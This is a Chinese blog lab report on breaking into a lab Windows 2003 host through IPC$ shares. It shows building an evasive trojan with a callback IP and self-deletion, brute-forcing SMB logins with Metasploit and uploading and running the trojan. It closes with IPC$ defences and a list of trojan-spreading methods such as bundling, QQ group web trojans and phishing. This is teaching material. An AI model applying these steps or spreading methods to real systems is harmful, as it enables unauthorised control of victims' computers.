远程控制---实验九:IPC远程植入木马

已于 2022-05-06 00:27:14 修改
阅读量3.6k 收藏 40
点赞数 4
分类专栏: 网络攻防实验 文章标签: 网络 web安全 网络安全
于 2022-05-06 00:11:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70557959/article/details/124597045
版权

目录

一、实验目的及要求

二、实验原理

IPC

空会话

IPC建立的过程

木马

三、实验环境

四、实验步骤及内容

五、实验总结

六、分析与思考

一、实验目的及要求

1、掌握利用 IPC$入侵目标计算机(windows XP 或 windows 2003)的方法;

2、制作并植入远控木马来达到远程控制对方计算机;

二、实验原理

IPC

IPC(Inter-Process Communication) 进程间通信,是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了IPC功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(C,D,E……)和系统目录winnt或windows(admin)共享。

空会话

空会话是在没有信任的情况下与服务器建立的会话,对于一个空会话,LSA提供的令牌的SID(空会话的SID)是S-1-5-7,用户名是:ANONYMOUS LOGON(系统内置的帐号),该访问令牌包含下面伪装的组:Everyone和Network。

IPC建立的过程

1.会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建立;

2.服务器产生一个随机的64位数(实现挑战)传送回客户;

3.客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结果返回到服务器(实现响应);

4.服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。

木马

利用计算机程序漏洞侵入后窃取文件的程序程序被称为木马。它是一种具有隐藏性的、自发性的可被用来进行恶意行为的程序,多不会直接对电脑产生危害,而是以控制为主。

三、实验环境

本实验环境的网络拓扑如下图:

说明:
1)网络由两个设备组成,一台靶机、一台攻击机
2)靶机上装的系统是windows 2003,ip地址:10.1.1.2;
3)攻击机是windows系统,其上有cmd命令行工具、远控木马、metasploit;
4)防火墙内部接口的IP和服务器的IP都已经配好。

四、实验步骤及内容

在开始本实验的任务前,通过下述步骤确定实验环境已经准备就绪。
1:登录到自己分配到的攻击机上,在"开始"-->"程序"中查看是否安装了Metasploit工具,C盘里是否有“2013最新免杀远程”压缩包,系统是否有CMD命令行工具。

2:命令行下ping靶机IP:10.1.1.2,确认靶机存在。

利用IPC共享漏洞上传并执行木马
本任务将利用IPC共享漏洞上传并执行木马。试验者登录攻击机以后的实验步骤如下:
1、利用远控木马生成服务端
解压C盘下tools文件夹里的“2013最新免杀远程”压缩包,并运行bin文件夹内Client2013.exe:
点击“选项”--> “创建客户”,如下图:
会出现如下对话框:

说明:
域名/IP:填写木马安装后向木马监控者发出信息的指定IP,一般为攻击者的IP,但是必须要受害者访问得到;
服务信息:伪装为某服务;
自删除:运行后会自己把自己删除,以消灭痕迹
选择图标:生成木马文件后的图标。
点击“生成”后,根据提示找到生成的木马文件,本例中会在当前文件夹生成,如下图:

将生成的木马文件移动到c盘下,不需要退出该程序。
2、利用Metasploit扫描目标主机ipc的弱口令,操作如下图所示

在msf提示符下输入use  auxiliary/scanner/smb/smb_login,以加载利用模块。输入show  options查看设置选项,如下图:

(图中user.txt为自己创建)

简单对参数进行了设置:
第一行:设置目标主机的ip
第二行: 设置用户名文件
第三行:设置密码文件
第四行:设置当成功时停止运行
然后输入“run”开始运行爆破

当成功时会自动停止,得到信息为: administrator :123456。

3、利用得到的用户名和密码,与目标主机建立空连接
依次点击:“开始”->“运行”->输入“CMD”打开CMD窗口,并输入如下命令与远程服务器建立连接。
依次输入下图命令:


命令说明:
第一行,cd \ 切换到C盘根目录下;
第二行的net use 命令与远程10.1.1.2建立连接。
将我们刚刚生成的服务端,上传到目标主机上去:


4、使用metasploit执行木马程序
输入下列命令调用执行模块:

输入下列命令设置参数:

输入下列命令设置参数:

这个时候就可以等待木马的上线,上线后的情形见下图:

五、实验总结

通过这个实验我们对进程间通信有了一定的了解,开放管道来建立连接,我们通过利用cmd命令和metasploit实现了账号密码获取和木马执行。

六、分析与思考

1)写出实验完成过程。

先利用IPC共享漏洞上传执行木马,生成木马服务端,然后利用metasploit扫描主机ip获取账号密码,建立空连接,执行木马。

2)如何防止建立IPC管道?

1.方法是关闭IPC$。关闭IPC$的方法是停止server服务,而停止了server服务,也就禁用了文件共享的功能,所以此种方法并不推荐。

2.方法是禁止建立IPC$连接,这是个人比较推荐的方法,具体操作需要修改注册表。

3)设计传递木马的传播方式,不少于三种。

1.用BT制作木马种子

2.利用QQ邮箱传播木马.

3.QQ群发网页木马。

4.捆绑欺骗

5.钓鱼式欺骗别人点击你的网页木马地址或木马.

DDdd...
关注
  • 4
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
木马远程控制和清除 实验
qq_53397065的博客
12-19 5046
实验4:木马远程控制和清除 实验目的 1. 理解木马的关键技术:包括木马的启动、隐藏和远程控制。 2. 使用一种木马实施远程控制,并进行清除。 二、实验环境 Windows7 x64系统虚拟机;Window XP 系统虚拟机;冰河 V8.4 三、实验原理 , 使用两台虚拟机,一台充当操作机,一台充当被种植木马的目标机,然后使用冰河木马对目标机实行远程控制。 四、实验内容 1.使用一种木马实施远程控制,具体而言,在被攻击者计算机...
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3674
msfvenom的使用
计算机木马
最新发布
缘友一世的博客
05-31 489
美国科恩博士(最早定义):计算机病毒是一种计算机程序,它通过修改其他程序把自己的一个拷贝或演化的拷贝插入到其他程序中实施感染传染特性:病毒可以自我繁殖演化特性:病毒在感染过程中可以改变自身的一些特征,以逃避查杀赛门铁克Peter Szor给出定义:计算机病毒是一种计算机程序,它递归地、明确地复制自己或其演化体。“明确递归”来区别病毒与正常程序的复制过程,“明确”强调自我复制是病毒的主要功能。“递归”反映一个文件在被病毒感染以后会进一步感染其他文件。
信息安全 漏洞利用
yidao0819的博客
05-22 560
实验目的 1、了解IPC$漏洞原理 2、掌握几个相关net 命令的用法 3、掌握PCshare生成远程控制程序工具的使用 实验原理 实验参考步骤: 1、确认目标的IPC$默认共享已经打开。 2、在本地利用net use与远程目标建立IPC$连接通道、 3、将目标的C盘映射为本地Z盘。 (至此,说明已成功入侵并控制对方C盘,继续进行可更方便地实现全方位的远程控制) 4、利用PCshare工具实现远程控制。 5、尝试获得远程主机的 Shell、用户列表、开启的服务列表、开放的端口列表等
MSF怎么把木马上传到目标
nlj1860453的博客
01-29 488
想必Kali小白总是做好了木马却不知道怎么上传到目标机器上,今天我就给大家讲一下上传木马的2钟办法。第一种办法是网站上传,在kali依次输入下面代码把木马上传到网站。此时在目标浏览器输入kali的IP可以看到木马就在网站上,点击文件链接下载后就可以打开了。什么?怎么会有人不会查看IP?kali和Windows查看IP的方法:ifconfigipconfig。
Windows server 2003操作系统的防护技巧,禁止IPC$空连接
驰网飞飞的博客
07-10 314
多年以来,微软一直在强调建议重命名Administrator账号并禁用Guest账号,提高计算机的安全性。Windows Server 2003系统,Guest 账号是默认禁用的,管理员账号默认是Administrator,修改用户名和定期修改密码,飞飞认为是非常必要的,入侵者暴力破解都是从管理员账号开始。
IPC$关闭原理和步骤
12-16 4549
IPC$ (2010-04-23 15:15:03) 转载▼ 标签: 杂谈 分类: 我的收藏 IPC$是共享命名管道的资源。在微软系列的操作系统中,为了让进程间共享通信而开放的命名管道。用户通过提供可信任的帐户与口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 所以,IPC$共享命名管道设计的意图是好的,也确实给管理员带来了方便。但是,由于其存在一定的漏洞,这也让黑客有机可乘。现在一些针对IPC$漏洞的攻击方案就有一大堆。有些甚至没有
linux 离线安装perl-IPC-Cmd
12-25
在没有互联网连接的情况下,离线安装Perl模块可能会变得有些复杂,但通过以下步骤,我们可以实现对`perl-IPC-Cmd`模块的离线安装。 首先,你需要确保你已经安装了基础的Perl环境。在大多数Linux发行版中,这可以...
9-IPC利用与远程控制实验
11-28
锐捷网络大学,isec综合实验ipc利用
parity-tokio-ipc:平价东京-IPC
05-30
parity-tokio-ipc 这个 crate 抽象了 UNIX/Windows 的进程间传输。 在 UNIX 上,它使用 unix 套接字( tokio_uds crate)和 windows 上的命名管道(实验性的tokio-named-pipes crate)。 端点是传入连接的传输不...
Pyro4:Pyro 4.x-Python远程对象
04-12
PYRO-Python远程对象 通过Pyro,您可以构建应用程序,使对象可以通过网络以最小的编程工作量彼此对话。 您可以只使用普通的Python方法调用来调用其他计算机上的对象。 Pyro是一个纯Python库,因此它可以在许多不同的...
一款强大的手机远控软件,无需ROOT
12-01
说明:软件安装完后桌面会出现 系统网络服务 的图标,先不要隐藏,设置好邮箱参数,测试下,正常后再进行隐藏!不需要ROOT!!! 注明:邮箱里的SMTP需要在自己邮箱里进行开启,不会的请自行百度!!
protobuf-ipc-example:协议缓冲区IPC示例
02-05
标题中的“protobuf-ipc-example”指的是使用Google的Protocol Buffers(简称protobuf)进行进程间通信(Inter-Process Communication, IPC)的一个示例项目。Protocol Buffers是一种数据序列化协议,可以将结构化...
挖矿病毒/远控木马排查思路(Windows系统)
qq_51845659的博客
03-18 1900
挖矿病毒/远控木马排查思路(NOP Team团队发布的《Windows应急响应手册》学习笔记)
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马
04-16 322
输入命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.147 lport=9999 -f exe -o MyDemo.exe。2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?设置攻击机的ip地址,该ip地址为读者所使用的Kali Linux的地址。6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?7、Tomcat和Resin有什么区别,工作中你怎么选择?
远程控制技术
2301_79023276的博客
12-08 350
实验过程中,遇到的困难是搜集对方网站的敏感信息,进入后台管理员,必须要熟悉掌握收集信息的方法。通过本次实验,掌握了使用主流的远控软件msf.学会使用webshell管理工具对一句话木马进行连接。实验原理:通过搜集御剑扫描可访问网站的地址来查找敏感信息,以此来进入对方网站后台管理员,在对方设置网页的代码里上传木马,蚁剑连接对方系统文件上传远控应用程序,通过msf漏洞利用获取shell。1.进入web系统后台后写入一句话木马,然后用中国蚁剑进行连接。2.用中国蚁剑进行连接后,使用msf进行远控。
[网络安全自学篇] 四十三.恶意样本原理及远程服务器IPC$安全缺陷解析
热门推荐
杨秀璋的专栏
01-30 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了DNS欺骗(DNS投毒)及钓鱼网站原理知识,并通过Ettercap工具复现某购物网站的钓鱼漏洞。本文将详细讲解木马原理知识,并通过远程服务器IPC $ 漏洞实现木马植入及控制远程服务器。希望这篇基础文章对您有所帮助,更希望大家提高安全意识,学会相关防范,也欢迎大家讨论。
内网渗透之IPC远程执行
weixin_30699741的博客
01-23 744
开启服务 net start Schedule net start wmiApSrv 关闭防火墙 net stop sharedaccess net use \\目标IP\ipc$ "" /user:"administrator"进行连接 net use \\目标IP\ipc$ 试环境:主机(windows XP sp3)与windows XP sp2虚拟机)通...
详细了解IPC$命令, 防止IPC$入侵、攻击
言出必行
09-08 3614
IPC$命令详解  一 摘要  二 什么是ipc$  三 什么是空会话  四 空会话可以做什么  五 ipc$所使用的端口  六 ipc管道在hack攻击中的意义  七 ipc$连接失败的常见原因  八 复制文件失败的原因  关于at命令和xp对ipc$的限制  十 如何打开目标的IPC$共享以及其他共享  十一 一些需要shell才能完成的命令  十二 入侵中可能会用到的命令  十三 对比过
IPC-7095C】-BGA设计与组装工艺的实施-(IPC标准).pdf
01-30
"IPC-7095C是IPC(国际电子工业联接协会)发布的一项标准,专门针对BGA(球栅阵列)的设计与组装工艺。该标准旨在促进电子行业的制造标准化,提高产品的可制造性和环境适应性,同时减少产品上市时间。IPC-7095C替代...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

DDdd...

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值